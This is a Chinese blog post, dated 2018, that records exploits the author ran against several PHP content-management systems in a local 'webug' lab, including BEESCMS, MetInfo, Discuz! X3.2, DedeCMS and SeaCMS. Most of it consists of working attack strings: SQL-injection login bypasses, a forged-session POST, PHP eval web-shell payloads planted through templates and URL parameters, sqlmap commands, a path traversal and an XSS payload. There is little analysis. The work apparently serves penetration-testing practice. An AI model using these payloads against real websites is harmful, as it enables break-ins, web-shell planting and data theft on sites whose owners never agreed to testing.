webug几类CMS实战扩展

  • by

正文:

还是要说明一下的是只是漏洞的直接利用,原理分析的话,怎么说呢,一是技术,二是知识面,现在去硬敲的话,不是很好。

1.万众电子期刊 漏洞利用

http://0day5.com/archives/3932/
直接就admin’or’=’or’就可以万能密码登录了
http://192.168.244.137/pentest/cms/wanzhong/admin/admin_main.php
配合解析漏洞上传得到shell

2.BEESCMS企业网站管理系统 漏洞利用

https://www.0dayhack.com/post-559.html
第一步:beescms/mx_form/mx_form.php?id=12
第二步:post一个{ _SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=100000000000000000000000000000000000 }
后台getshell:
beescms/admin/admin_template.php?nav=list_tpl&admin_p_nav=tpl
编辑一个模板,写入 {print @eval($_POST[‘cmd’])/}
成功:
http://192.168.244.137/pentest/cms/beecms/sitemap/sitemap.php
post cmd=phpinfo();

3.ourphp

https://www.0dayhack.com/post-657.html
)union selselectect 1,user(),3,4,5– p0′
密码随便填

4.phpwind < v6 版本命令执行漏洞

https://blog.csdn.net/qq_27446553/article/details/50667501
OICQ 53kf 没有这个账号所以没有实际去操作
${@eval($_POST[x])}XXXX
请求访问那个帖子,直到帖子的访问量排入前20
第二天,生成统计排行的时候,shell就躺在了 /data/bbscache/article_sort.php

5.MetInfo 5.0.4 漏洞利用

https://blog.csdn.net/key_book/article/details/80604830
sql:直接sqlmap跑
http://192.168.244.137/pentest/cms/metinfoxiugai/about/show.php?lang=cn&id=22
sqlmap -u “http://192.168.244.137/pentest/cms/metinfoxiugai/about/show.php?lang=cn&id=22” –batch –dbs
2)http://192.168.244.137/pentest/cms/metinfoxiugai/about/index.php?fmodule=7&module=../../phpinfo.php
3)http://192.168.244.137/pentest/cms/metinfoxiugai/admin/include/uploadify.php

6.Discuz! X3.2

这个前台getshell要管理员权限,平台给的直接是管理员。
如果不是。配合xss,管理员登陆查看时触发即可
1)https://blog.csdn.net/weixin_40966980/article/details/78965672
这里有个验证码的地址,为:http://localhost/uc_server/admin.php?m=seccode&seccodeauth=07d4kVIZ%2Fj5pecd%2Bv7%2FuE0zfvj%2FKRIrF3pmAd%2BupYhm4GT4&1104676922
验证码一直是
cccc
应该是每个ip第一次访问的话都是这个,所以可以用来爆破
2)xss https://www.cnblogs.com/dropsaxing/p/6697611.html
payload:[align=”onmouseover=”alert(1)]
管理员 xss
admin
http://192.168.244.137/pentest/cms/dz3.2/forum.php?mod=viewthread&tid=1&extra=
sql https://www.secpulse.com/archives/26869.html
Access Denied, Error mod request!

7.DedeCMS 5.7 /plus/flink_add.php SQL注入漏洞

https://www.seebug.org/vuldb/ssvid-89275
DedeCMS Error: (PHP 5.3 and above) Please set ‘request_order’ ini value to include C,G and P (recommended: ‘CGP’) in php.ini,more…
sqlmap

8.海洋cms

直接
http://192.168.244.137/pentest/cms/haiyang/search.php?searchtype=5&tid=&area=eval($_POST[1])
菜刀链接

9.

https://www.0dayhack.com/post-559.html
BEESCMS和2一样
后台:http://192.168.244.137/pentest/cms/deescms/admin/admin.php
 
2018.7.9

发表评论

电子邮件地址不会被公开。 必填项已用*标注